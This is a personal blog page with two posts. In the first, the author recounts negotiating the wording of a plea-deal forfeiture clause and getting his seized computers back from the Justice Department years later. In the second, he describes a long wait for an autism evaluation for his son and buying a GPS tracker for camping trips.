Me: "Mine, you'll find, is worded differently. The change is subtle, but important. Can you pull mine up, and read the first sentence of the forfeiture clause to me?"

Agent: "'The defendant forfeits and otherwise waives any ownership right in all items involved in the acts alleged in the Bill of Information or Bill of Indictment.' Now see, I told you…"

Me: "Read Adam's Forfeiture clause. His is the boilerplate one. He had much bigger fish to fry than I did."

Agent: "*murmering to himself as he read it, tried to compare it*. 'I don't see the difference here.'."

Me: "I'll fax over a copy for your review, so you can see the difference. This was specifically negotiated, and I should be able to enforce it in court."

Agent: "I'm just trying to do my job, and close this case out."

Me: "I understand that, but I had a deal with the US government, and they can't try to get out of their obligations under the agreement just because they're inconvenient 10 years later. This is a written and enforceable contract, and this was an inseparable part of the deal. I can't go and un-serve probation, and the government can't change their mind after the fact"

Agent: "If you can fax me the highlighted sections, I'll run this by my boss."

Me: "No problem, I'm hitting send on the fax right now. Talk to you soon!"

My lawyer thought I was crazy for worrying about this, but I demanded a 2 word change in the plea bargain. The prosecutor was anxious to close the deal, and figured it was a very minor change, he assured me it 'only changed the wording, as I'd get back anything not used in the crime anyway'. I knew otherwise.

Adam's forfeiture language
Adam's forfeiture language
My forfeiture language
My forfeiture language

Suddenly, the change is clear, isn't it? The court only had the right to dispose of one computer – the laptop used to connect to the Lowe's network to check my email.

Small problem for them – They never bothered doing forensics on any of my data.

The FBI agent calls back a few days later, says this is all well and good, but there's over 40 hard drives and do I really expect them to do forensics on the drives to determine what was used in the crime and what wasn't? ABSOLUTELY. I offered to tell them the serial number of the laptop used to connect to the wifi, to let them wipe that, but they stated they couldn't just take my word for it.

Then, I said, they'd better dust off their copies of encase, and get to work. Because "it'd look stupid if you had to tell a judge you didn't want to honor my civil rights because it's really hard, and time consuming, but not important enough to do over the past 10 years we've had the data"

I didn't hear from them for a few months. I figured they were mulling their options.

…3 months later…

A very upset call from Fedex to my cell phone. Apparently I missed a dropoff. And the items were very, very large. And they were not pleased about that.

"Where are the items shipping from?"

"US Department of Justice, Western District of North Carolina…. Sounds like these are important, huh?"

"That's an understatement. My wife was at an appointment, she'll be home all day tomorrow. Can you reattempt delivery then?"

"Sure. Thanks for choosing FedEx!"

I got a call from Becky the next day. Apparently, the packages were too large for the FedEx delivery driver to carry himself. Becky had to help unload and carry them. Inside, were hundreds of pounds of equipment, paperwork, videotapes, CDs, … everything. Untouched.

Over the last month, I've been firing up machines one by one, and finding to my amazement that after a decade in storage, 100% of the data was intact and recoverable. I haven't gotten to the floppy disks yet, but my Kryoflux controller should make short work of that. Then my professional grade editing SVHS deck should make viewing the videotapes a snap.

I leave you with a celebratory posting of the oldest photo I can find of myself – this is from October of 2000, on my last day at Isiah.com before they went out of business. I looked like a dweeb back then.

paul n richard

Welcome to the wonderful world of specialists!

So we got a call from Henry Ford's Center for Autism and Developmental Disabilities. They got the paperwork! (Well, that was actually a separate call earlier this week, letting me know they got it and didn't forget about us…) And they were happy to let me know that they were wanting to set Billy up for the next available appointment date.

I of course asked when that was.

"October 16th! We have an opening at 9am and noon!"

"… what? That's your earliest date?"

"Yes. We can add him to the cancellation list too, something might come up earlier, it happens from time to time"

"ok. Well, he'll be in school for a few months by then, so let's schedule it after class so it's less disruptive to his schedule. noon sounds great."

sigh.

Could be worse, a parent on MyAutismTeam commented on my post there saying U of M is scheduling appointments 2 YEARS OUT. TWO WHOLE YEARS. Good lord.

Anyway, we also ordered this today. Celluar based GPS tracker should be good for when we're camping this summer. Last summer we had a minor incident where he wandered 3 rows of tents down to play with someone else's dog. Back then he was essentially nonverbal so it was extra scary. Now, he'll have GPS tracking, be trained how to swim (which he gets better at every day, 18 weeks of formal 1:1 training and swimming 3 times a week will do that, I guess!), and be equipped with a PECS to help him communicate where words fail him.

We still plan on using the teddy bear beacon/tracker for times when we expect him to try to wander off (like at Eastern Market, or at the fireworks, both of which he loves, but also loves to try to seek his own path, which obviously is unacceptable!), but the GPS will give us peace of mind if he disappears at times we don't expect him to. The GPS duty cycle and battery is supposedly good for 3 days. If we're good about keeping it plugged in at night, this should be perfect for essentially 24/7 monitoring. Not sure where we'll attach it yet, I may have to make it a waterproof shoe case. I wish I could just strap it to his ankle like a criminal's tether, but i can see him trying to focus every bit of energy on getting that off him posthaste, damaging it if necessary. (if he's one thing, it's clever and determined!).

The personal website of Paul Timmins – Telecommunications expert, father.